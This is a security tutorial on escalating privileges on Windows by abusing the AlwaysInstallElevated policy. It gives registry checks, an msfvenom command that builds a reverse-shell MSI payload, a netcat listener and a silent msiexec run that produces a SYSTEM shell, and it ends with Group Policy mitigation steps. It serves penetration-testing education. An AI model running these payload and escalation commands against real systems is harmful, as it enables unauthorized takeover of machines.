Windows Privilege Escalation AlwaysInstallElevated#

In a privilege escalation attack, Attackers get system access with low privilege and then attempt to gain higher rights to do operations that are restricted to less privileged users. Attackers gain administrative access to the network by exploiting design flaws, programming faults, bugs, and configuration blunders in the operating system and software applications. In this article, we will gain administrative privileges via the misconfigured AlwaysInstalledElevated group policy settings.

Windows operating system includes a Windows Installer engine that uses MSI packages to install the software. Windows environments provide a group policy setting that allows a regular user to install a Microsoft Windows Installer Package (MSI) with system privileges. This policy is enabled in the Local group policy which directs windows os to use system privileges to install any program on the system. This setting makes the system vulnerable to privilege escalation attacks as normal users can run the installation with elevated privileges.

Note: This option is equivalent to granting full SYSTEM rights, which can pose a massive security risk. Microsoft strongly discourages the use of this setting.

This article assumes that we have already compromised the system and have a meterpreter session. Getuid


As we can see that we are logged as a normal user and not an admin.

To check if this system is vulnerable to the AlwaysInstallElevated privilege escalation attack. Run the following command to query registry keys to check whether the windows installer has elevated privileges or not.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer


From the above screenshot, the registry named AlwaysInstallElevated exists with a dword value of 0x1 which means that the AlwaysInstallElevated is enabled both on the CURRENT USER and LOCAL MACHINE. This vulnerability can be also be verified using winpeas.exe. WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts.

winPEASx64.exe quiet systeminfo


Exploiting via .msi payload#

To escalate the privileges, open a new terminal and type the following command to generate an MSI file named “installer.msi” using the msfvenom tool.

msfvenom -p windows/x64/shell_reverse_tcp lhost= lport=1234 -f msi > installer.msi
lhost : it is listener's IP address
Lport : it is listener port 


Let’s upload our MSI file named installer.msi to the target computer using the user’s active Meterpreter session. upload <path_to_msi_file>


When it successfully uploads, open up the shell by typing shell in meterpreter. Next set up a netcat listener, which will listen for our reverse shell connection when the msi file will be executed by the victim host.

sudo nc -nlvp <listner_port> 
-p : to specify the port to listen on 
-l : to listen for a connection 
-n : to skip the DNS lookup
-v : for verbose mode 


The following command can be used to execute the MSI file on the windows command.
msiexec /quiet /qn /i installer.msi

/quiet : quiet mode, this means suppress any messages to the user while installing
/qn : specifies no GUI
/i : specifies normal installation


After the package is installed, the malicious code is run, giving the system SYSTEM level access through a reverse shell.


Now we have a SYSTEM level shell.


To mitigate this type of attack, the following steps can be used in Group Policy editor to resolve the misconfiguration. Configure the policy value to "Disabled" for Computer Configuration \Administrative Templates\Windows Components \Windows Installer \"Always install with elevated privileges"


User Configuration\Administrative Templates\Windows Components\Windows Installer \"Always install with elevated privileges"


See also

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